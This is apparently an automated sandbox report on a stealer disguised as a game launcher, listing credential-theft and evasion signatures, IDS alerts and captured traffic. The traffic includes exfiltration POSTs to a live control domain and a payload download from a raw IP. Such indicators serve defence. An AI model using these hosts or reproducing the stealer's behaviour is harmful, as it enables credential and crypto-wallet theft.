Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Call 0f Duty A1 Launcher.exe

Overview

General Information

Sample name:Call 0f Duty A1 Launcher.exe
Analysis ID:1561495
MD5:fad119b9db79ccbfe3a65a13f0822b22
SHA1:db0992d62adb36a46b493063dd5192bb27422bb9
SHA256:27550a73b832d92b6a6a3869f0dedbb826c7c97348587342fe02c8c7cf98e0b9
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Call 0f Duty A1 Launcher.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe" MD5: FAD119B9DB79CCBFE3A65A13F0822B22)
    • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Call 0f Duty A1 Launcher.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe" MD5: FAD119B9DB79CCBFE3A65A13F0822B22)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1711652873.00000000035F3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1711171222.00000000035E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:05:59.751154+010020283713Unknown Traffic192.168.2.449730104.21.33.116443TCP
              2024-11-23T15:06:01.704643+010020283713Unknown Traffic192.168.2.449731104.21.33.116443TCP
              2024-11-23T15:06:04.285115+010020283713Unknown Traffic192.168.2.449732104.21.33.116443TCP
              2024-11-23T15:06:06.513365+010020283713Unknown Traffic192.168.2.449733104.21.33.116443TCP
              2024-11-23T15:06:08.727761+010020283713Unknown Traffic192.168.2.449734104.21.33.116443TCP
              2024-11-23T15:06:11.203989+010020283713Unknown Traffic192.168.2.449735104.21.33.116443TCP
              2024-11-23T15:06:13.720808+010020283713Unknown Traffic192.168.2.449736104.21.33.116443TCP
              2024-11-23T15:06:17.766046+010020283713Unknown Traffic192.168.2.449738104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:06:00.435968+010020546531A Network Trojan was detected192.168.2.449730104.21.33.116443TCP
              2024-11-23T15:06:02.409509+010020546531A Network Trojan was detected192.168.2.449731104.21.33.116443TCP
              2024-11-23T15:06:18.463443+010020546531A Network Trojan was detected192.168.2.449738104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:06:00.435968+010020498361A Network Trojan was detected192.168.2.449730104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:06:02.409509+010020498121A Network Trojan was detected192.168.2.449731104.21.33.116443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:06:11.941657+010020480941Malware Command and Control Activity Detected192.168.2.449735104.21.33.116443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Call 0f Duty A1 Launcher.exeJoe Sandbox ML: detected
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: Call 0f Duty A1 Launcher.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: number of queries: 1001
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeCode function: 0_2_006CC7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006CC7DB

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 104.21.33.116:443
              Source: Joe Sandbox ViewIP Address: 104.21.33.116 104.21.33.116
              Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.33.116:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.33.116:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8J0IL4TVRGUJQMNBHV3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18173Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3JDFRV3OG3YAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8752Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MKVFJJNDBTQSO0JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20423Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BNQFUY8T3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1214Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G2MCMEH5ENA9DZQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587545Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
              Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090339829.0000000003543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exebsxn
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exefi
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/f1
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780276053.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1711171222.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780196146.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734814414.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734882109.00000000035D8000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861877709.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756607448.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780276053.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiG
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiU
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861877709.00000000035C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiWi.
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apic
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
